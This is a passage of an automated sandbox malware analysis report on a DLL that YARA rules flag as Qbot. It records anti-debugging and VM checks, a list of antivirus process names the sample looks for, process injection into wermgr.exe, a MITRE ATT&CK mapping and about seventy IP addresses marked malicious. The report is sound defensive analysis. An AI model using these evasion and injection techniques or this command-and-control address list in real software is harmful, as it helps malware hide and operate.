Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wermgr.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\rundll32.exe TID: 5392	Thread sleep count: 181 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe TID: 6848	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_17-13010

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_10035030 rdtsc

3_2_10035030

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_17-11954

Source: C:\Windows\SysWOW64\wermgr.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_0494B883 GetSystemInfo,

17_2_0494B883

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_04949DA8 FindFirstFileW,FindNextFileW,

17_2_04949DA8

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1g

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_10035030 Start: 10035315 End: 1003515E

3_2_10035030

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress,

3_2_1001F523

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_10035030 rdtsc

3_2_10035030

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001E0D9 mov eax, dword ptr fs:[00000030h]	3_2_1001E0D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_3_046B2297 mov eax, dword ptr fs:[00000030h]	17_3_046B2297
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_04941015 mov eax, dword ptr fs:[00000030h]	17_2_04941015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_049421CD mov eax, dword ptr fs:[00000030h]	17_2_049421CD

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 760000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 730000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1093C50	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 730000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 760000 protect: page read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Windows\SysWOW64\wermgr.exe base: 730000 value starts with: 4D5A

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wermgr.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_0494C2D1 GetSystemTimeAsFileTime,

17_2_0494C2D1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_10092180 GetTimeZoneInformation,GetModuleHandleA,GetProcAddress,

3_2_10092180

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 17_2_0494BB4D GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,

17_2_0494BB4D

Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgcsrvx.exe
Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: rundll32.exe, 00000011.00000003.409796816.00000000049FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Qbot

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 17.2.rundll32.exe.4940000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2c51168.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2c51168.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.418718397.0000000004980000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Qbot

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 17.2.rundll32.exe.4940000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2c51168.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2c51168.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.418718397.0000000004980000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.418554458.0000000002C3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 Credential API Hooking	2 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	1 Input Capture	31 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Rundll32	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	113 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
F072.dll	3%	ReversingLabs	Win32.Malware.Generic
F072.dll	6%	Virustotal		Browse
F072.dll	100%	Avira	HEUR/AGEN.1363694

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xfinity.com	68.87.41.40	true	false		high
www.xfinity.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://xfinity.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.xfinity.com/mobile/policies/broadband-disclosures	national[1].htm.24.dr	false	high
http://upx.sf.net	Amcache.hve.8.dr	false	high
https://www.xfinity.com/learn/internet-service/acp	national[1].htm.24.dr	false	high
https://www.xfinity.com/networkmanagement	national[1].htm.24.dr	false	high
https://streams.videolan.org/upload/	rundll32.exe, rundll32.exe, 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.399211143.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.407006224.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.414998004.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.414998450.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.419061010.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, F072.dll	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
2.82.8.80	unknown	Portugal	3243	MEO-RESIDENCIALPT	true
70.160.67.203	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
75.143.236.149	unknown	United States	20115	CHARTER-20115US	true
83.110.223.61	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	true
86.195.14.72	unknown	France	3215	FranceTelecom-OrangeFR	true
84.215.202.8	unknown	Norway	41164	GET-NOGETNorwayNO	true
184.182.66.109	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
92.186.69.229	unknown	France	12479	UNI2-ASES	true
174.4.89.3	unknown	Canada	6327	SHAWCA	true
161.142.103.187	unknown	Malaysia	9930	TTNET-MYTIMEdotComBerhadMY	true
114.143.176.236	unknown	India	17762	HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdIN	true
14.192.241.76	unknown	Malaysia	9534	MAXIS-AS1-APBinariangBerhadMY	true
173.88.135.179	unknown	United States	10796	TWC-10796-MIDWESTUS	true
84.108.200.161	unknown	Israel	8551	BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL	true
47.34.30.133	unknown	United States	20115	CHARTER-20115US	true
183.87.163.165	unknown	India	132220	JPRDIGITAL-INJPRDigitalPvtLtdIN	true
184.181.75.148	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
124.149.143.189	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
84.35.26.14	unknown	Netherlands	21221	INFOPACT-ASTheNetherlandsNL	true
73.29.92.128	unknown	United States	7922	COMCAST-7922US	true
68.203.69.96	unknown	United States	11427	TWC-11427-TEXASUS	true
82.131.141.209	unknown	Hungary	20845	DIGICABLEHU	true
64.121.161.102	unknown	United States	6079	RCN-ASUS	true
178.175.187.254	unknown	Moldova Republic of	43289	TRABIAMD	true
96.56.197.26	unknown	United States	6128	CABLE-NET-1US	true
186.64.67.30	unknown	Argentina	27953	NODOSUDSAAR	true
188.28.19.84	unknown	United Kingdom	206067	H3GUKGB	true
125.99.76.102	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	true
81.101.185.146	unknown	United Kingdom	5089	NTLGB	true
68.87.41.40	xfinity.com	United States	7922	COMCAST-7922US	false
59.28.84.65	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
105.186.128.181	unknown	South Africa	37457	Telkom-InternetZA	true
76.86.31.59	unknown	United States	20001	TWC-20001-PACWESTUS	true
147.147.30.126	unknown	United Kingdom	6871	PLUSNETUKInternetServiceProviderGB	true
96.87.28.170	unknown	United States	7922	COMCAST-7922US	true
75.109.111.89	unknown	United States	19108	SUDDENLINK-COMMUNICATIONSUS	true
78.92.133.215	unknown	Hungary	5483	MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHU	true
124.122.47.148	unknown	Thailand	17552	TRUE-AS-APTrueInternetCoLtdTH	true
88.126.94.4	unknown	France	12322	PROXADFR	true
85.57.212.13	unknown	Spain	12479	UNI2-ASES	true
51.14.29.227	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
47.205.25.170	unknown	United States	5650	FRONTIER-FRTRUS	true
95.45.50.93	unknown	Ireland	5466	EIRCOMInternetHouseIE	true
80.12.88.148	unknown	France	3215	FranceTelecom-OrangeFR	true
69.133.162.35	unknown	United States	11426	TWC-11426-CAROLINASUS	true
86.132.236.117	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
151.62.238.176	unknown	Italy	1267	ASN-WINDTREIUNETEU	true
70.112.206.5	unknown	United States	11427	TWC-11427-TEXASUS	true
205.237.67.69	unknown	Canada	11290	CC-3272CA	true
102.159.188.125	unknown	Tunisia	37705	TOPNETTN	true
151.65.167.77	unknown	Italy	1267	ASN-WINDTREIUNETEU	true
76.178.148.107	unknown	United States	10838	OCEANIC-INTERNET-RRUS	true
89.36.206.69	unknown	Italy	48544	TECNOADSL-ASIT	true
69.242.31.249	unknown	United States	7922	COMCAST-7922US	true
193.253.100.236	unknown	France	3215	FranceTelecom-OrangeFR	true
76.16.49.134	unknown	United States	7922	COMCAST-7922US	true
94.207.104.225	unknown	United Arab Emirates	15802	DU-AS1AE	true
201.244.108.183	unknown	Colombia	19429	ETB-ColombiaCO	true
103.42.86.42	unknown	India	133660	EDIGITAL-ASE-InfrastructureandEntertainmentIndiaPvtLt	true
78.18.105.11	unknown	Ireland	2110	AS-BTIREBTIrelandwaspreviouslyknownasEsatNetEUnet	true
80.6.50.34	unknown	United Kingdom	5089	NTLGB	true
103.144.201.56	unknown	unknown	139762	MSSOLUTION-AS-APSolutionBD	true
27.0.48.233	unknown	India	132573	SAINGN-AS-INSAINGNNetworkServicesIN	true
70.28.50.223	unknown	Canada	577	BACOMCA	true
98.145.23.67	unknown	United States	20001	TWC-20001-PACWESTUS	true
47.149.134.231	unknown	United States	5650	FRONTIER-FRTRUS	true
82.125.44.236	unknown	France	3215	FranceTelecom-OrangeFR	true
81.229.117.95	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	true
89.129.109.27	unknown	Spain	12479	UNI2-ASES	true
122.186.210.254	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	true
